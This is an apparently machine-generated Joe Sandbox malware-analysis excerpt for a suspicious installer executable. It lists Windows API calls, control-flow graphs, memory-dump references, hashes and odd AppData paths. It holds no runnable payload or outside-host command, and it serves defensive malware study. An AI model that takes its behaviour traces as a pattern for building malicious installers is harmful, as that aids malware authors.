                                                                                                • Associated: 00000000.00000002.1738523211.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.000000000043E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738523211.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                • Associated: 00000000.00000002.1738655046.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                                                                                • String ID: C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Circulation\Hendecasyllabic
                                                                                                • API String ID: 3751793516-3586988424
                                                                                                • Opcode ID: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                                                • Instruction ID: 35652dd05d7f301adf099aa328e5cc987f695832d4750e36514a93e4da09e5cd
                                                                                                • Opcode Fuzzy Hash: 06e8dec69cecf1aed292983b268229df3b0dc48255432652a051c134e1b2d356
                                                                                                • Instruction Fuzzy Hash: B9113231600115EBCB206FA0DD44AAE3BB0EF053A9B24053BF882B22E0D6394981DB5D

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 707 405c13-405c45 RegOpenKeyExW 708 405c87-405c8a 707->708 709 405c47-405c66 RegQueryValueExW 707->709 710 405c74 709->710 711 405c68-405c6c 709->711 712 405c77-405c81 RegCloseKey 710->712 711->712 713 405c6e-405c72 711->713 712->708 713->710 713->712
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
                                                                                                • RegQueryValueExW.KERNELBASE(?,?,00000000,?,?,?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C5E
                                                                                                • RegCloseKey.ADVAPI32(?,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C81
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID: : Completed
                                                                                                • API String ID: 3677997916-2954849223
                                                                                                • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                                                                • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                                                                • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 714 4059fe-405a0a 715 405a0b-405a3f GetTickCount GetTempFileNameW 714->715 716 405a41-405a43 715->716 717 405a4e-405a50 715->717 716->715 718 405a45 716->718 719 405a48-405a4b 717->719 718->719
                                                                                                APIs
                                                                                                • GetTickCount.KERNEL32 ref: 00405A1C
                                                                                                • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CountFileNameTempTick
                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                                                                • API String ID: 1716503409-678247507
                                                                                                • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                                                                • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                                                                • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 720 401e51-401e62 call 402ad0 call 404ffa call 4054c8 726 401e67-401e6c 720->726 727 401e72-401e75 726->727 728 402729-402730 726->728 730 401ec6-401ecf CloseHandle 727->730 731 401e77-401e87 WaitForSingleObject 727->731 729 40295d-40296c 728->729 730->728 730->729 733 401e97-401e99 731->733 734 401e89-401e95 call 4060e9 WaitForSingleObject 733->734 735 401e9b-401eab GetExitCodeProcess 733->735 734->733 737 401eba-401ebd 735->737 738 401ead-401eb8 call 405c8d 735->738 737->730 742 401ebf 737->742 738->730 742->730
                                                                                                APIs
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                                                                  • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,74DF23A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                                                                  • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,74DF23A0), ref: 00405055
                                                                                                  • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                                                                  • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                                                                  • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                                  • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                                • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                • String ID:
                                                                                                • API String ID: 3585118688-0
                                                                                                • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                                                • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                                                                • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                                                                • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99

                                                                                                Control-flow Graph

                                                                                                control_flow_graph 744 4054c8-4054f5 CreateProcessW 745 405503-405504 744->745 746 4054f7-405500 CloseHandle 744->746 746->745
                                                                                                APIs
                                                                                                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                                                                • CloseHandle.KERNEL32(?), ref: 004054FA
                                                                                                Strings
                                                                                                • Error launching installer, xrefs: 004054DB
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                • String ID: Error launching installer
                                                                                                • API String ID: 3712363035-66219284
                                                                                                • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                                                                • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                                                                • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
                                                                                                APIs
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 0040603D
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                                                                  • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\LMSxhK1u8Z.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406051
                                                                                                  • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 00406064
                                                                                                • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,74DF3420,00403390), ref: 004031CA
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Char$Next$CreateDirectoryPrev
                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                • API String ID: 4115351271-517883005
                                                                                                • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                                • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                                                                • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                                                                • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                                                                APIs
                                                                                                  • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                                                                • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CloseOpenQueryValue
                                                                                                • String ID:
                                                                                                • API String ID: 3677997916-0
                                                                                                • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                                                                • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                                                                • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                                                                • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                                                                APIs
                                                                                                • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                                                                  • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                                                                • String ID:
                                                                                                • API String ID: 1691843260-0
                                                                                                • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                                                • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                                                                • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                                                                • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                                                                APIs
                                                                                                • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                                • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                                                                • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                                                                • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                                                                APIs
                                                                                                • OleInitialize.OLE32(00000000), ref: 004050DD
                                                                                                  • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: InitializeMessageSendUninitialize
                                                                                                • String ID:
                                                                                                • API String ID: 2896919175-0
                                                                                                • Opcode ID: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                                                • Instruction ID: cb2347d6cbc19b0f628d54f49591885684dc807da670f32007c6c40ab910fdb0
                                                                                                • Opcode Fuzzy Hash: 10ef6d87f3fd7bea8bde0a3b6e3cee34a91868ef9ffca7f293b6e213662e1e0e
                                                                                                • Instruction Fuzzy Hash: A8F024339006008BD3016BA1AD02B977764FBC4306F09403AEE44762E1DBB658018B5D
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(00000003,00402D3F,C:\Users\user\Desktop\LMSxhK1u8Z.exe,80000000,00000003,?,?,?,00000000,004033FE,?), ref: 004059D3
                                                                                                • CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,?,00000000,004033FE,?), ref: 004059F5
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: File$AttributesCreate
                                                                                                • String ID:
                                                                                                • API String ID: 415043291-0
                                                                                                • Opcode ID: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                • Instruction ID: 1eb9dddf645dfc1e42ea27fadde30db719d7f554b9b2fef872a17e27e5e15d7e
                                                                                                • Opcode Fuzzy Hash: 37c4dc7839c603de99ed6860e60369df17b6bb7e4a2ae391e088aaa007eea51a
                                                                                                • Instruction Fuzzy Hash: C0D09E71654601EFEF098F20DE16F6EBBA2EB84B00F11952DB692940E0DA7158199B15
                                                                                                APIs
                                                                                                • GetFileAttributesW.KERNELBASE(?,?,00405599,?,?,00000000,00405785,?,?,?,?), ref: 004059AF
                                                                                                • SetFileAttributesW.KERNEL32(?,00000000), ref: 004059C3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                • Instruction ID: 5089437a0038f9672fdec650e2f42df5ceafcb3a9c98f83db2fa6512ef2061e4
                                                                                                • Opcode Fuzzy Hash: 05994f7bb8a1ec96a0acbdf87cb19798dc47de50d2a954d4e2c693c8e603d6f5
                                                                                                • Instruction Fuzzy Hash: 09D012B2504520EFC2103728EF0C89BBF65DB543717028B35FDB5A22F0CB304C568A99
                                                                                                APIs
                                                                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402288
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileStringWrite
                                                                                                • String ID:
                                                                                                • API String ID: 390214022-0
                                                                                                • Opcode ID: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                                • Instruction ID: 0b657d416b15e43c0193b3f865d343ab07691dd64d9d569c69532df3a91b5b61
                                                                                                • Opcode Fuzzy Hash: 45cd240e89cb35acd2adb5c5489ef0982fec4b8f4934da7d4fbc5eb992d52d3a
                                                                                                • Instruction Fuzzy Hash: 82E0BF32A045696ADB2036F20E8D97F30589B54754F15057FB513BA1C2DDFC0D815AAD
                                                                                                APIs
                                                                                                • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,000000FF,?,00402F8B,000000FF,00000004,00000000,00000000,00000000), ref: 00403177
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FileRead
                                                                                                • String ID:
                                                                                                • API String ID: 2738559852-0
                                                                                                • Opcode ID: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                                • Instruction ID: 71aeb53177ba50d05d0cf1bc79962ee68b95cc51097d41dc468827112562ad25
                                                                                                • Opcode Fuzzy Hash: 233ad9278b8c44b78323ef9ef70cff2e7f1b2f0f6aab1e28ab7980f1b25ba47d
                                                                                                • Instruction Fuzzy Hash: 88E08C32114218BBCF205FA19C04AE73F5CEB093A2F00C03ABD18E9290D234DA15DBE8
                                                                                                APIs
                                                                                                • RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: Open
                                                                                                • String ID:
                                                                                                • API String ID: 71445658-0
                                                                                                • Opcode ID: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                • Instruction ID: 3dbf039cb61568b40e8fd4d19fef357c16506d2f59f835c7eaccd1bdbf02c8de
                                                                                                • Opcode Fuzzy Hash: cce1f9145786d5949352606fac99e7e5e067a1059cfd452124556763b682a866
                                                                                                • Instruction Fuzzy Hash: A3E04676290108AFDB00EFA4EE4AFD93BECAB08704F008021B609E6091DA74F5408B6C
                                                                                                APIs
                                                                                                • GetPrivateProfileStringW.KERNEL32(00000000,?,?,?,000003FF,00000000), ref: 004022C4
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: PrivateProfileString
                                                                                                • String ID:
                                                                                                • API String ID: 1096422788-0
                                                                                                • Opcode ID: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                                • Instruction ID: 032603440061492facc866799902dc36791b8dee2dcfc8dfbdbcdfe83c4889f9
                                                                                                • Opcode Fuzzy Hash: 74d14b167e5f6999f806f0de9605a955cbc6b2f8afcacdbae3200fcd2487e3c0
                                                                                                • Instruction Fuzzy Hash: FCE0BF71940208BADB10AFA1CD49AED3A68EF01754F10443AF552BB0D1EAF995C1AB59
                                                                                                APIs
                                                                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: AttributesFile
                                                                                                • String ID:
                                                                                                • API String ID: 3188754299-0
                                                                                                • Opcode ID: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                                                • Instruction ID: 561d33903432245b5a5ec808ba248510e0ad320ee7677a05499f6c71c576feb8
                                                                                                • Opcode Fuzzy Hash: e8bb238b6c1997d302efcbd6551df5b11c37b88c8e9cb2d5373f431501d37c19
                                                                                                • Instruction Fuzzy Hash: 54D01772704112DBCB10EBE9AA0869D7AA49B41369F204537D212F21D0D6B89585AB2E
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                • Instruction ID: d706231c2cc37d53405596eccba3c731e42e433def08e4c59de364e12d4351e7
                                                                                                • Opcode Fuzzy Hash: 9e65635282c074142b62a8ba3745162e207d8da54d0fb15254cf3d135f65430d
                                                                                                • Instruction Fuzzy Hash: 3EC09B757447017FEA108F609D47F1777687B64702F1844397640F50D0CBB4D510DA1C
                                                                                                APIs
                                                                                                • SendMessageW.USER32(00000028,?,00000001,00403DF6), ref: 00403FD8
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID:
                                                                                                • API String ID: 3850602802-0
                                                                                                • Opcode ID: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                • Instruction ID: 691050d084ac05b3cc339cea154a0297f3c15b89657cbedd253a0759ece72884
                                                                                                • Opcode Fuzzy Hash: e477a3a50dd78a48aeb7b6ea670792f8d9a3182ab48aff94ce9bae91fd3f6ce1
                                                                                                • Instruction Fuzzy Hash: 23B01236181A00BFDF114B10EE0AF857E62F7AC701F018438B340240F0CBF200A0DB08
                                                                                                APIs
                                                                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EC6,?,?,?,?,00000000,004033FE,?), ref: 004031A0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: FilePointer
                                                                                                • String ID:
                                                                                                • API String ID: 973152223-0
                                                                                                • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                                                                • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                                                                • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                                                                APIs
                                                                                                • KiUserCallbackDispatcher.NTDLL(?,00403D8F), ref: 00403FC1
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000000.00000002.1738484876.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_0_2_400000_LMSxhK1u8Z.jbxd
                                                                                                Similarity
                                                                                                • API ID: CallbackDispatcherUser
                                                                                                • String ID:
                                                                                                • API String ID: 2492992576-0
                                                                                                • Opcode ID: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                • Instruction ID: d41632a2b0a6fb41d9385d651c54052ae940fbff5a4ac867539882f0f930e1f3
                                                                                                • Opcode Fuzzy Hash: 4849bdeb8750a14631e4aa7a28107b59e5a3d104c0e95e28136b5315d8d1c657
                                                                                                • Instruction Fuzzy Hash: 92A01132800200EFCE0A8B80EF0AC0ABB22BBA0300B008038A280800308A320830EB08
                                                                                                APIs
                                                                                                • GetDlgItem.USER32(?,000003F9), ref: 0040498E
                                                                                                • GetDlgItem.USER32(?,00000408), ref: 00404999
                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 004049E3
                                                                                                • LoadBitmapW.USER32(0000006E), ref: 004049F6
                                                                                                • SetWindowLongW.USER32(?,000000FC,00404F6E), ref: 00404A0F
                                                                                                • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404A23
                                                                                                • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 00404A35
                                                                                                • SendMessageW.USER32(?,00001109,00000002), ref: 00404A4B
                                                                                                • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00404A57
                                                                                                • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00404A69
